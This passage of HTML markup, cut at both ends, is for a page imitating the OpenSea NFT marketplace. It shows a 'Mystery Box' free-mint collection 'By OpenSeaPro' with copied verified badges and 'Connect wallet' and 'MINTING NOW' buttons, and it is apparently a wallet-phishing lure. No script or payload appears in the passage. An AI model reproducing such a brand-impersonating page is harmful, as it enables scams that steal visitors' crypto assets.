                d="M56.0288 29.2327C54.692 29.2327 53.4643 28.9178 52.3458 28.2881C51.2272 27.6584 50.3405 26.7892 49.6858 25.6804C49.031 24.5579 48.7036 23.2917 48.7036 21.8817C48.7036 20.4855 49.031 19.2329 49.6858 18.1241C50.3405 17.0016 51.2272 16.1256 52.3458 15.4959C53.4643 14.8662 54.692 14.5513 56.0288 14.5513C57.3793 14.5513 58.607 14.8662 59.7119 15.4959C60.8305 16.1256 61.7103 17.0016 62.3515 18.1241C63.0062 19.2329 63.3336 20.4855 63.3336 21.8817C63.3336 23.2917 63.0062 24.5579 62.3515 25.6804C61.7103 26.7892 60.8305 27.6584 59.7119 28.2881C58.5934 28.9178 57.3657 29.2327 56.0288 29.2327ZM56.0288 26.666C56.8882 26.666 57.6453 26.4744 58.3001 26.0911C58.9548 25.6941 59.4664 25.1328 59.8347 24.4073C60.203 23.6818 60.3872 22.84 60.3872 21.8817C60.3872 20.9235 60.203 20.0885 59.8347 19.3767C59.4664 18.6512 58.9548 18.0968 58.3001 17.7135C57.6453 17.3302 56.8882 17.1385 56.0288 17.1385C55.1695 17.1385 54.4056 17.3302 53.7372 17.7135C53.0824 18.0968 52.5708 18.6512 52.2025 19.3767C51.8342 20.0885 51.6501 20.9235 51.6501 21.8817C51.6501 22.84 51.8342 23.6818 52.2025 24.4073C52.5708 25.1328 53.0824 25.6941 53.7372 26.0911C54.4056 26.4744 55.1695 26.666 56.0288 26.666Z"
                fill="#353840"></path>
              <path
                d="M67.5106 19.3561C67.8789 18.8359 68.3836 18.4047 69.0248 18.0625C69.6795 17.7066 70.423 17.5286 71.2551 17.5286C72.2236 17.5286 73.0966 17.7682 73.8742 18.2473C74.6653 18.7264 75.286 19.4108 75.7361 20.3006C76.1999 21.1767 76.4318 22.1965 76.4318 23.3601C76.4318 24.5236 76.1999 25.5572 75.7361 26.4606C75.286 27.3504 74.6653 28.0417 73.8742 28.5345C73.0966 29.0273 72.2236 29.2737 71.2551 29.2737C70.423 29.2737 69.6864 29.1026 69.0452 28.7604C68.4177 28.4181 67.9062 27.9869 67.5106 27.4668V34.5097H64.646V17.7134H67.5106V19.3561ZM73.5058 23.3601C73.5058 22.6756 73.3626 22.087 73.0762 21.5942C72.8033 21.0877 72.435 20.7044 71.9712 20.4444C71.5211 20.1843 71.03 20.0542 70.498 20.0542C69.9796 20.0542 69.4886 20.1911 69.0248 20.4649C68.5746 20.725 68.2063 21.1083 67.9198 21.6148C67.647 22.1212 67.5106 22.7167 67.5106 23.4012C67.5106 24.0856 67.647 24.6811 67.9198 25.1876C68.2063 25.694 68.5746 26.0842 69.0248 26.358C69.4886 26.618 69.9796 26.7481 70.498 26.7481C71.03 26.7481 71.5211 26.6112 71.9712 26.3374C72.435 26.0636 72.8033 25.6735 73.0762 25.167C73.3626 24.6605 73.5058 24.0582 73.5058 23.3601Z"
                fill="#353840"></path>
              <path
                d="M88.8471 23.1548C88.8471 23.5654 88.8198 23.935 88.7652 24.2636H80.4783C80.5465 25.0849 80.833 25.7283 81.3377 26.1937C81.8424 26.6591 82.4631 26.8918 83.1997 26.8918C84.2637 26.8918 85.0208 26.4332 85.4709 25.5161H88.5606C88.2332 26.6112 87.6057 27.5147 86.6781 28.2265C85.7506 28.9246 84.6115 29.2737 83.2611 29.2737C82.1698 29.2737 81.1876 29.0341 80.3146 28.555C79.4552 28.0622 78.78 27.3709 78.2889 26.4812C77.8115 25.5914 77.5728 24.5647 77.5728 23.4012C77.5728 22.2239 77.8115 21.1904 78.2889 20.3006C78.7663 19.4108 79.4348 18.7264 80.2941 18.2473C81.1535 17.7682 82.1425 17.5286 83.2611 17.5286C84.3387 17.5286 85.3004 17.7613 86.1461 18.2268C87.0055 18.6922 87.6671 19.3561 88.1309 20.2185C88.6084 21.0672 88.8471 22.046 88.8471 23.1548ZM85.8801 22.3334C85.8665 21.5942 85.6005 21.0056 85.0821 20.5676C84.5638 20.1158 83.9295 19.89 83.1792 19.89C82.4699 19.89 81.8697 20.109 81.3786 20.547C80.9012 20.9714 80.6079 21.5668 80.4988 22.3334H85.8801Z"
                fill="#353840"></path>
              <path
                d="M96.6057 17.5492C97.9564 17.5492 99.0477 17.9804 99.8798 18.8428C100.712 19.6915 101.128 20.8824 101.128 22.4156V29.0889H98.2633V22.8057C98.2633 21.9023 98.038 21.211 97.5878 20.7319C97.1377 20.2391 96.5241 19.9927 95.7463 19.9927C94.9553 19.9927 94.3279 20.2391 93.8641 20.7319C93.4139 21.211 93.1886 21.9023 93.1886 22.8057V29.0889H90.3242V17.7135H93.1886V19.1303C93.5708 18.6375 94.055 18.2542 94.6416 17.9804C95.2418 17.6929 95.8963 17.5492 96.6057 17.5492Z"
                fill="#353840"></path>
              <path
                d="M107.76 29.2327C106.764 29.2327 105.864 29.0616 105.059 28.7193C104.268 28.3771 103.64 27.8843 103.177 27.2409C102.713 26.5976 102.474 25.8378 102.46 24.9617H105.53C105.571 25.5504 105.775 26.0158 106.144 26.358C106.525 26.7002 107.044 26.8713 107.699 26.8713C108.367 26.8713 108.892 26.7139 109.274 26.3991C109.656 26.0705 109.847 25.6462 109.847 25.126C109.847 24.7016 109.717 24.3526 109.458 24.0788C109.199 23.805 108.872 23.5928 108.476 23.4423C108.094 23.278 107.562 23.1 106.88 22.9084C105.953 22.6346 105.195 22.3677 104.609 22.1076C104.036 21.8338 103.538 21.43 103.115 20.8961C102.706 20.3486 102.501 19.6231 102.501 18.7196C102.501 17.8709 102.713 17.1317 103.136 16.502C103.559 15.8723 104.152 15.3932 104.916 15.0647C105.68 14.7224 106.553 14.5513 107.535 14.5513C109.008 14.5513 110.202 14.9141 111.116 15.6396C112.043 16.3514 112.555 17.3507 112.65 18.6375H109.499C109.472 18.1447 109.26 17.7408 108.865 17.426C108.483 17.0975 107.971 16.9332 107.33 16.9332C106.771 16.9332 106.321 17.0769 105.98 17.3644C105.652 17.6519 105.489 18.0694 105.489 18.6169C105.489 19.0002 105.612 19.3219 105.857 19.582C106.116 19.8284 106.43 20.0337 106.798 20.198C107.18 20.3486 107.712 20.5265 108.394 20.7319C109.322 21.0056 110.079 21.2794 110.666 21.5532C111.252 21.827 111.757 22.2376 112.18 22.7852C112.603 23.3328 112.814 24.0514 112.814 24.9412C112.814 25.7078 112.616 26.4196 112.221 27.0767C111.825 27.7337 111.245 28.2608 110.481 28.6577C109.717 29.041 108.81 29.2327 107.76 29.2327Z"
                fill="#353840"></path>
              <path
                d="M125.016 23.1548C125.016 23.5654 124.989 23.935 124.935 24.2636H116.648C116.716 25.0849 117.002 25.7283 117.507 26.1937C118.012 26.6591 118.632 26.8918 119.369 26.8918C120.433 26.8918 121.19 26.4332 121.64 25.5161H124.73C124.403 26.6112 123.775 27.5147 122.848 28.2265C121.92 28.9246 120.781 29.2737 119.43 29.2737C118.339 29.2737 117.357 29.0341 116.484 28.555C115.625 28.0622 114.949 27.3709 114.458 26.4812C113.981 25.5914 113.742 24.5647 113.742 23.4012C113.742 22.2239 113.981 21.1904 114.458 20.3006C114.936 19.4108 115.604 18.7264 116.464 18.2473C117.323 17.7682 118.312 17.5286 119.43 17.5286C120.508 17.5286 121.47 17.7613 122.316 18.2268C123.175 18.6922 123.837 19.3561 124.3 20.2185C124.778 21.0672 125.016 22.046 125.016 23.1548ZM122.05 22.3334C122.036 21.5942 121.77 21.0056 121.252 20.5676C120.733 20.1158 120.099 19.89 119.349 19.89C118.639 19.89 118.039 20.109 117.548 20.547C117.071 20.9714 116.777 21.5668 116.668 22.3334H122.05Z"
                fill="#353840"></path>
              <path
                d="M125.961 23.3601C125.961 22.2102 126.187 21.1904 126.637 20.3006C127.1 19.4108 127.721 18.7264 128.499 18.2473C129.29 17.7682 130.17 17.5286 131.138 17.5286C131.984 17.5286 132.721 17.6997 133.348 18.042C133.989 18.3842 134.501 18.8154 134.883 19.3356V17.7134H137.768V29.0889H134.883V27.4257C134.514 27.9596 134.003 28.4044 133.348 28.7604C132.707 29.1026 131.963 29.2737 131.118 29.2737C130.163 29.2737 129.29 29.0273 128.499 28.5345C127.721 28.0417 127.1 27.3504 126.637 26.4606C126.187 25.5572 125.961 24.5236 125.961 23.3601ZM134.883 23.4012C134.883 22.703 134.746 22.1076 134.473 21.6148C134.201 21.1083 133.832 20.725 133.369 20.4649C132.905 20.1911 132.407 20.0542 131.875 20.0542C131.343 20.0542 130.852 20.1843 130.402 20.4444C129.951 20.7044 129.583 21.0877 129.297 21.5942C129.024 22.087 128.887 22.6756 128.887 23.3601C128.887 24.0445 129.024 24.6468 129.297 25.167C129.583 25.6735 129.951 26.0636 130.402 26.3374C130.865 26.6112 131.356 26.7481 131.875 26.7481C132.407 26.7481 132.905 26.618 133.369 26.358C133.832 26.0842 134.201 25.7009 134.473 25.2081C134.746 24.7016 134.883 24.0993 134.883 23.4012Z"
                fill="#353840"></path>
              <path
                d="M151.906 18.966C151.906 20.1569 151.496 21.1493 150.678 21.9433C149.873 22.7236 148.639 23.1137 146.974 23.1137H144.233V29.0889H142.371V14.7772H146.974C148.584 14.7772 149.805 15.1673 150.637 15.9476C151.483 16.7278 151.906 17.734 151.906 18.966ZM146.974 21.5737C148.011 21.5737 148.775 21.3478 149.266 20.8961C149.757 20.4444 150.003 19.801 150.003 18.966C150.003 17.2001 148.993 16.3172 146.974 16.3172H144.233V21.5737H146.974Z"
                fill="url(#paint0_linear_13_61)"></path>
              <path
                d="M155.263 19.6641C155.591 19.0207 156.055 18.5211 156.655 18.1652C157.269 17.8092 158.012 17.6313 158.885 17.6313V19.5614H158.394C156.307 19.5614 155.263 20.6976 155.263 22.97V29.0889H153.401V17.8366H155.263V19.6641Z"
                fill="url(#paint1_linear_13_61)"></path>
              <path
                d="M165.107 29.2737C164.056 29.2737 163.101 29.0342 162.242 28.5551C161.396 28.0759 160.728 27.3983 160.237 26.5223C159.759 25.6325 159.521 24.6058 159.521 23.4423C159.521 22.2924 159.766 21.2794 160.257 20.4033C160.762 19.5135 161.444 18.8359 162.303 18.3705C163.163 17.8914 164.124 17.6519 165.188 17.6519C166.252 17.6519 167.214 17.8914 168.073 18.3705C168.933 18.8359 169.608 19.5067 170.099 20.3828C170.604 21.2589 170.856 22.2787 170.856 23.4423C170.856 24.6058 170.597 25.6325 170.079 26.5223C169.574 27.3983 168.885 28.0759 168.012 28.5551C167.139 29.0342 166.171 29.2737 165.107 29.2737ZM165.107 27.6311C165.775 27.6311 166.402 27.4736 166.989 27.1588C167.576 26.8439 168.046 26.3717 168.401 25.742C168.769 25.1123 168.953 24.3457 168.953 23.4423C168.953 22.5388 168.776 21.7722 168.421 21.1425C168.067 20.5128 167.603 20.0474 167.03 19.7463C166.457 19.4314 165.836 19.274 165.168 19.274C164.486 19.274 163.858 19.4314 163.285 19.7463C162.726 20.0474 162.276 20.5128 161.935 21.1425C161.594 21.7722 161.423 22.5388 161.423 23.4423C161.423 24.3594 161.587 25.1328 161.915 25.7625C162.256 26.3922 162.706 26.8645 163.265 27.1793C163.824 27.4805 164.438 27.6311 165.107 27.6311Z"
                fill="url(#paint2_linear_13_61)"></path>
              <mask id="mask1_13_61" style="mask-type:luminance" maskUnits="userSpaceOnUse" x="0" y="3" width="43"
                height="38">
                <path d="M42.8781 3.42224H0.730957V40.8222H42.8781V3.42224Z" fill="white"></path>
              </mask>
              <g mask="url(#mask1_13_61)">
                <mask id="mask2_13_61" style="mask-type:luminance" maskUnits="userSpaceOnUse" x="0" y="3" width="43"
                  height="38">
                  <path
                    d="M42.4938 20.6827L33.3913 4.86177C32.8788 3.97099 31.9318 3.42224 30.907 3.42224H12.7023C11.6774 3.42224 10.7302 3.97099 10.2178 4.86177L1.11537 20.6827C0.602821 21.5735 0.602821 22.671 1.11537 23.5618L10.2176 39.3827C10.7302 40.2735 11.6772 40.8222 12.7022 40.8222H30.9067C31.9318 40.8222 32.8788 40.2735 33.3913 39.3827L42.4936 23.5618C43.0061 22.671 43.0063 21.5735 42.4938 20.6827ZM16.0319 11.9448C17.2943 13.5545 18.0474 15.5852 18.0474 17.7926C18.0474 19.7041 17.4812 21.4822 16.51 22.9703H9.68085L16.0319 11.9448ZM36.8584 25.4093V25.4137C36.8584 25.5049 36.8089 25.5855 36.7241 25.621C36.2613 25.82 34.7347 26.5288 34.0982 27.4184C32.4601 29.7074 31.208 33.3085 28.4107 33.3085H16.7376C12.6048 33.3085 9.14479 30.0161 9.1491 25.6315C9.1491 25.5217 9.24018 25.432 9.34947 25.432H14.8823C15.0715 25.432 15.2249 25.586 15.2249 25.776V26.8476C15.2249 27.4174 15.6852 27.8792 16.2528 27.8792L20.4494 27.8779V25.4284H17.5815C19.229 23.3314 20.2127 20.685 20.2127 17.8076C20.2127 14.593 18.9855 11.6663 16.9761 9.47241C18.1915 9.61363 19.3535 9.85648 20.4494 10.1808V9.49947C20.4494 8.79166 21.0212 8.21802 21.7266 8.21802C22.4319 8.21802 23.0037 8.79181 23.0037 9.49947V11.1433C26.9228 12.9781 29.4864 16.0225 29.4864 19.4685C29.4864 21.4889 28.6048 23.3713 27.0855 24.9532C26.7932 25.2575 26.3881 25.4286 25.967 25.4286H23.0037V27.8777L26.7197 27.8767C27.5223 27.8767 28.9597 26.3524 29.6423 25.4325C29.6423 25.4325 29.6712 25.3868 29.7497 25.3641C29.8281 25.3413 36.5753 23.7863 36.5753 23.7863C36.7156 23.7469 36.8584 23.8547 36.8584 24.002V25.4098V25.4093Z"
                    fill="white"></path>
                </mask>
                <g mask="url(#mask2_13_61)">
                  <path d="M17.1312 -8.5274L-6.98242 33.3853L0.652794 37.809L24.7664 -4.10374L17.1312 -8.5274Z"
                    fill="url(#paint3_linear_13_61)"></path>
                  <path d="M23.8241 -4.65002L-0.289551 37.2627L7.17235 41.5859L31.286 -0.326768L23.8241 -4.65002Z"
                    fill="url(#paint4_linear_13_61)"></path>
                  <path d="M30.5157 -0.772705L6.40186 41.14L14.0942 45.5967L38.208 3.68406L30.5157 -0.772705Z"
                    fill="url(#paint5_linear_13_61)"></path>
                  <path d="M37.2089 3.10443L13.0952 45.0171L20.9361 49.5601L45.0498 7.64728L37.2089 3.10443Z"
                    fill="url(#paint6_linear_13_61)"></path>
                  <path d="M43.8998 6.98199L19.7861 48.8946L26.4782 52.7719L50.5919 10.8593L43.8998 6.98199Z"
                    fill="url(#paint7_linear_13_61)"></path>
                </g>
              </g>
            </g>
          </g>
          <defs>
            <linearGradient id="paint0_linear_13_61" x1="122.358" y1="6.15218" x2="161.705" y2="39.475"
              gradientUnits="userSpaceOnUse">
              <stop offset="0.395833" stop-color="#FEC847"></stop>
              <stop offset="0.655475" stop-color="#EF7A9D"></stop>
              <stop offset="1" stop-color="#E05BDD"></stop>
            </linearGradient>
            <linearGradient id="paint1_linear_13_61" x1="122.358" y1="6.15218" x2="161.705" y2="39.475"
              gradientUnits="userSpaceOnUse">
              <stop offset="0.395833" stop-color="#FEC847"></stop>
              <stop offset="0.655475" stop-color="#EF7A9D"></stop>
              <stop offset="1" stop-color="#E05BDD"></stop>
            </linearGradient>
            <linearGradient id="paint2_linear_13_61" x1="122.358" y1="6.15221" x2="161.705" y2="39.475"
              gradientUnits="userSpaceOnUse">
              <stop offset="0.395833" stop-color="#FEC847"></stop>
              <stop offset="0.655475" stop-color="#EF7A9D"></stop>
              <stop offset="1" stop-color="#E05BDD"></stop>
            </linearGradient>
            <linearGradient id="paint3_linear_13_61" x1="5.854" y1="10.6193" x2="11.6594" y2="18.2506"
              gradientUnits="userSpaceOnUse">
              <stop stop-color="#E272E4"></stop>
              <stop offset="0.995" stop-color="#E15BD3"></stop>
            </linearGradient>
            <linearGradient id="paint4_linear_13_61" x1="20.343" y1="16.6984" x2="8.69592" y2="20.9228"
              gradientUnits="userSpaceOnUse">
              <stop stop-color="#F3708B"></stop>
              <stop offset="0.313" stop-color="#F26F8D"></stop>
              <stop offset="0.511" stop-color="#F06C96"></stop>
              <stop offset="0.678" stop-color="#EC69A4"></stop>
              <stop offset="0.827" stop-color="#E863B9"></stop>
              <stop offset="0.963" stop-color="#E15CD4"></stop>
              <stop offset="1" stop-color="#E05ADD"></stop>
            </linearGradient>
            <linearGradient id="paint5_linear_13_61" x1="18.2086" y1="16.2824" x2="25.3543" y2="26.9007"
              gradientUnits="userSpaceOnUse">
              <stop stop-color="#F47E7C"></stop>
              <stop offset="1" stop-color="#F76DA1"></stop>
            </linearGradient>
            <linearGradient id="paint6_linear_13_61" x1="24.5123" y1="19.3695" x2="32.0499" y2="30.798"
              gradientUnits="userSpaceOnUse">
              <stop stop-color="#FFE146"></stop>
              <stop offset="1" stop-color="#F771A2"></stop>
            </linearGradient>
            <linearGradient id="paint7_linear_13_61" x1="31.6803" y1="25.9588" x2="38.3087" y2="33.3087"
              gradientUnits="userSpaceOnUse">
              <stop stop-color="#FCC945"></stop>
              <stop offset="1" stop-color="#F89E85"></stop>
            </linearGradient>
            <clipPath id="clip0_13_61">
              <rect width="171" height="44" fill="white"></rect>
            </clipPath>
          </defs>
        </svg>
      </div>
    </div>
    <div class="inputs_head">
      <div class="searche">
        <div class="magnifying">
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none">
            <path
              d="M19.5 9.75C19.5 11.9016 18.8016 13.8891 17.625 15.5016L23.5594 21.4406C24.1453 22.0266 24.1453 22.9781 23.5594 23.5641C22.9734 24.15 22.0219 24.15 21.4359 23.5641L15.5016 17.625C13.8891 18.8063 11.9016 19.5 9.75 19.5C4.36406 19.5 0 15.1359 0 9.75C0 4.36406 4.36406 0 9.75 0C15.1359 0 19.5 4.36406 19.5 9.75ZM9.75 16.5C10.6364 16.5 11.5142 16.3254 12.3331 15.9862C13.1521 15.647 13.8962 15.1498 14.523 14.523C15.1498 13.8962 15.647 13.1521 15.9862 12.3331C16.3254 11.5142 16.5 10.6364 16.5 9.75C16.5 8.86358 16.3254 7.98583 15.9862 7.16689C15.647 6.34794 15.1498 5.60382 14.523 4.97703C13.8962 4.35023 13.1521 3.85303 12.3331 3.51381C11.5142 3.17459 10.6364 3 9.75 3C8.86358 3 7.98583 3.17459 7.16689 3.51381C6.34794 3.85303 5.60382 4.35023 4.97703 4.97703C4.35023 5.60382 3.85303 6.34794 3.51381 7.16689C3.17459 7.98583 3 8.86358 3 9.75C3 10.6364 3.17459 11.5142 3.51381 12.3331C3.85303 13.1521 4.35023 13.8962 4.97703 14.523C5.60382 15.1498 6.34794 15.647 7.16689 15.9862C7.98583 16.3254 8.86358 16.5 9.75 16.5Z"
              fill="#89929A"></path>
          </svg>
        </div>
        <div class="inputs_head_inner">
          <input type="text" placeholder="Search items, collections, and accounts">
        </div>
        <div class="slash">
          <span>/</span>
        </div>
      </div>
      <div class="connect ">
        <button class="connect_btn connectButton" ad-data-linked="true">
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="#353840">
            <path
              d="M21.6188 6H3.75C3.33562 6 3 5.66438 3 5.25C3 4.83562 3.33562 4.5 3.75 4.5H21.75C22.1644 4.5 22.5 4.16438 22.5 3.75C22.5 2.50734 21.4927 1.5 20.25 1.5H3C1.34297 1.5 0 2.84297 0 4.5V19.5C0 21.157 1.34297 22.5 3 22.5H21.6188C22.9322 22.5 24 21.4908 24 20.25V8.25C24 7.00922 22.9322 6 21.6188 6ZM19.5 15.75C18.6717 15.75 18 15.0783 18 14.25C18 13.4217 18.6717 12.75 19.5 12.75C20.3283 12.75 21 13.4217 21 14.25C21 15.0783 20.3283 15.75 19.5 15.75Z">
            </path>
          </svg>
          <span class="">Connect wallet</span>
        </button>
        <a href="#" class="user">
          <svg xmlns="http://www.w3.org/2000/svg" width="28" height="28" viewBox="0 0 28 28" fill="none">
            <g clip-path="url(#clip0_2_16)">
              <path
                d="M22.2305 21.8531C21.1859 19.2992 18.6758 17.5 15.75 17.5H12.25C9.32422 17.5 6.81406 19.2992 5.76953 21.8531C3.82266 19.8078 2.625 17.0461 2.625 14C2.625 7.71641 7.71641 2.625 14 2.625C20.2836 2.625 25.375 7.71641 25.375 14C25.375 17.0461 24.1773 19.8078 22.2305 21.8531ZM20.0375 23.6414C18.2875 24.7406 16.2203 25.375 14 25.375C11.7797 25.375 9.7125 24.7406 7.95703 23.6414C8.35625 21.6344 10.1281 20.125 12.25 20.125H15.75C17.8719 20.125 19.6437 21.6344 20.043 23.6414H20.0375ZM14 28C17.713 28 21.274 26.525 23.8995 23.8995C26.525 21.274 28 17.713 28 14C28 10.287 26.525 6.72601 23.8995 4.10051C21.274 1.475 17.713 0 14 0C10.287 0 6.72601 1.475 4.10051 4.10051C1.475 6.72601 0 10.287 0 14C0 17.713 1.475 21.274 4.10051 23.8995C6.72601 26.525 10.287 28 14 28ZM14 13.125C13.4198 13.125 12.8634 12.8945 12.4532 12.4843C12.043 12.0741 11.8125 11.5177 11.8125 10.9375C11.8125 10.3573 12.043 9.80094 12.4532 9.3907C12.8634 8.98047 13.4198 8.75 14 8.75C14.5802 8.75 15.1366 8.98047 15.5468 9.3907C15.957 9.80094 16.1875 10.3573 16.1875 10.9375C16.1875 11.5177 15.957 12.0741 15.5468 12.4843C15.1366 12.8945 14.5802 13.125 14 13.125ZM9.1875 10.9375C9.1875 12.2139 9.69453 13.4379 10.597 14.3405C11.4996 15.243 12.7236 15.75 14 15.75C15.2764 15.75 16.5004 15.243 17.403 14.3405C18.3055 13.4379 18.8125 12.2139 18.8125 10.9375C18.8125 9.66115 18.3055 8.43707 17.403 7.53455C16.5004 6.63203 15.2764 6.125 14 6.125C12.7236 6.125 11.4996 6.63203 10.597 7.53455C9.69453 8.43707 9.1875 9.66115 9.1875 10.9375Z"
                fill="#353840"></path>
            </g>
            <defs>
              <clipPath id="clip0_2_16">
                <rect width="28" height="28" fill="white"></rect>
              </clipPath>
            </defs>
          </svg>
        </a>
        <button class="basket">
          <svg xmlns="http://www.w3.org/2000/svg" width="21" height="20" viewBox="0 0 17 16" fill="none">
            <g clip-path="url(#clip0_8_14)">
              <path
                d="M6 8.8H12.4C13 8.8 13.5 8.5 13.8 8L16.3 3.3C16.5 2.9 16.5 2.5 16.3 2.2C16.1 1.9 15.7 1.7 15.3 1.7H3.5L3.2 0.9C3 0.3 2.5 0 1.9 0H0V1.5H1.8L4.5 7.9C4.5 7.9 4.5 8 4.6 8L3.2 10C3 10.4 3 10.9 3.2 11.3C3.4 11.7 3.8 12 4.3 12H14.3V10.5H4.7L5.9 8.8H6ZM4.2 3.1H14.6L12.4 7.3H6L4.2 3.1Z"
                fill="#0D0D0D"></path>
              <path
                d="M5.0999 15.1C5.76264 15.1 6.2999 14.5628 6.2999 13.9C6.2999 13.2373 5.76264 12.7 5.0999 12.7C4.43716 12.7 3.8999 13.2373 3.8999 13.9C3.8999 14.5628 4.43716 15.1 5.0999 15.1Z"
                fill="#0D0D0D"></path>
              <path
                d="M13.0999 15.1C13.7626 15.1 14.2999 14.5628 14.2999 13.9C14.2999 13.2373 13.7626 12.7 13.0999 12.7C12.4372 12.7 11.8999 13.2373 11.8999 13.9C11.8999 14.5628 12.4372 15.1 13.0999 15.1Z"
                fill="#0D0D0D"></path>
            </g>
            <defs>
              <clipPath id="clip0_8_14">
                <rect width="16.3" height="15.1" fill="white"></rect>
              </clipPath>
            </defs>
          </svg>
        </button>
      </div>
    </div>
  </header>
  <main>
    <div class="main_screen">
      <div class="screen_lable">
        <div class="video">
          <div class="color_tone"></div>
          <video autoplay="" loop="" playsinline="" muted="">
            <source src="img/high.mp4" type="video/mp4">
          </video>
        </div>
        <div class="screen_lable_content">
          <div class="lable_content_left">
            <div class="lable_screen_logo">
              <img src="389-9bec97c22fa2e411.gif" alt="">
            </div>
            <div class="lable_screen_username">
              <span>Mystery Box</span>
              <span class="vefify">
                <svg aria-label="verified-icon" class="sc-9c65691d-0 cuRIUG sc-10a5570d-8 kxjtCy" fill="none"
                  viewBox="0 0 43 46">
                  <path clip-rule="evenodd"
                    d="M23.6741 2.0787C22.3933 0.494275 19.9777 0.494276 18.6969 2.0787L16.932 4.26193C16.1363 5.24636 14.835 5.66918 13.6126 5.3405L10.9015 4.61157C8.93402 4.08257 6.97973 5.50245 6.87485 7.5371L6.73034 10.3407C6.66518 11.6049 5.86095 12.7118 4.67879 13.1644L2.05704 14.1682C0.154385 14.8967 -0.592088 17.1941 0.519004 18.9018L2.05002 21.255C2.74036 22.316 2.74036 23.6842 2.05002 24.7453L0.519003 27.0984C-0.592088 28.8061 0.154384 31.1035 2.05704 31.832L4.67879 32.8358C5.86095 33.2884 6.66518 34.3954 6.73034 35.6595L6.87485 38.4631C6.97973 40.4978 8.93402 41.9177 10.9015 41.3887L13.6126 40.6597C14.835 40.3311 16.1363 40.7539 16.932 41.7383L18.6969 43.9215C19.9777 45.506 22.3933 45.506 23.6741 43.9215L25.4389 41.7383C26.2347 40.7539 27.536 40.3311 28.7584 40.6597L31.4695 41.3887C33.4369 41.9177 35.3912 40.4978 35.4961 38.4631L35.6406 35.6595C35.7058 34.3953 36.51 33.2884 37.6922 32.8358L40.3139 31.832C42.2166 31.1035 42.963 28.8061 41.8519 27.0984L40.3209 24.7453C39.6306 23.6842 39.6306 22.316 40.3209 21.255L41.8519 18.9018C42.963 17.1941 42.2166 14.8967 40.3139 14.1682L37.6922 13.1644C36.51 12.7118 35.7058 11.6049 35.6406 10.3407L35.4961 7.53709C35.3912 5.50244 33.4369 4.08257 31.4695 4.61157L28.7584 5.3405C27.536 5.66918 26.2347 5.24636 25.4389 4.26193L23.6741 2.0787ZM32.8789 17.6449L29.9646 14.7307L18.6075 26.0878L14.1075 21.5878L11.1933 24.5021L18.6075 31.9163L32.8789 17.6449Z"
                    fill="white" fill-rule="evenodd"></path>
                </svg>
              </span>
            </div>
            <div class="lable_owner">
              <span>By</span> <span class="hover">OpenSeaPro</span>
              <span class="vefify">
                <svg aria-label="verified-icon" class="sc-9c65691d-0 cuRIUG sc-10a5570d-8 kxjtCy" fill="none"
                  viewBox="0 0 43 46">
                  <path clip-rule="evenodd"
                    d="M23.6741 2.0787C22.3933 0.494275 19.9777 0.494276 18.6969 2.0787L16.932 4.26193C16.1363 5.24636 14.835 5.66918 13.6126 5.3405L10.9015 4.61157C8.93402 4.08257 6.97973 5.50245 6.87485 7.5371L6.73034 10.3407C6.66518 11.6049 5.86095 12.7118 4.67879 13.1644L2.05704 14.1682C0.154385 14.8967 -0.592088 17.1941 0.519004 18.9018L2.05002 21.255C2.74036 22.316 2.74036 23.6842 2.05002 24.7453L0.519003 27.0984C-0.592088 28.8061 0.154384 31.1035 2.05704 31.832L4.67879 32.8358C5.86095 33.2884 6.66518 34.3954 6.73034 35.6595L6.87485 38.4631C6.97973 40.4978 8.93402 41.9177 10.9015 41.3887L13.6126 40.6597C14.835 40.3311 16.1363 40.7539 16.932 41.7383L18.6969 43.9215C19.9777 45.506 22.3933 45.506 23.6741 43.9215L25.4389 41.7383C26.2347 40.7539 27.536 40.3311 28.7584 40.6597L31.4695 41.3887C33.4369 41.9177 35.3912 40.4978 35.4961 38.4631L35.6406 35.6595C35.7058 34.3953 36.51 33.2884 37.6922 32.8358L40.3139 31.832C42.2166 31.1035 42.963 28.8061 41.8519 27.0984L40.3209 24.7453C39.6306 23.6842 39.6306 22.316 40.3209 21.255L41.8519 18.9018C42.963 17.1941 42.2166 14.8967 40.3139 14.1682L37.6922 13.1644C36.51 12.7118 35.7058 11.6049 35.6406 10.3407L35.4961 7.53709C35.3912 5.50244 33.4369 4.08257 31.4695 4.61157L28.7584 5.3405C27.536 5.66918 26.2347 5.24636 25.4389 4.26193L23.6741 2.0787ZM32.8789 17.6449L29.9646 14.7307L18.6075 26.0878L14.1075 21.5878L11.1933 24.5021L18.6075 31.9163L32.8789 17.6449Z"
                    fill="white" fill-rule="evenodd"></path>
                </svg>
              </span>
            </div>
            <div class="lable_miting">
              <div class="lable_dot">
                <div class="amin">

                </div>
                <div class="statick">

                </div>
              </div>
              <div class="lable_btn connectButton">
                MINTING NOW
              </div>
            </div>
          </div>
          <div class="lable_content_right">

          </div>
        </div>
      </div>
    </div>
    <div class="main_content ">
      <div class="tabs">
        <div class="tab1">FREE MINT</div>

      </div>
      <div class="row"></div>
      <div class="about_content">
        <div class="main_user">
          <div class="about">
            <div class="about_lable">
              <h2>About this collection</h2>
            </div>
            <div class="about_user">
              <div class="lable_content_logo">
                <img src="389-9bec97c22fa2e411.gif" alt="logo">
              </div>
              <div class="lable_content_author">
                <div class="content_author_username">
                  <span>Mystery Box</span>
                  <svg aria-label="verified-icon" class="sc-9c65691d-0 cuRIUG sc-10a5570d-8 kxjtCy" fill="#008ce6"
                    viewBox="0 0 43 46">
                    <path clip-rule="evenodd"
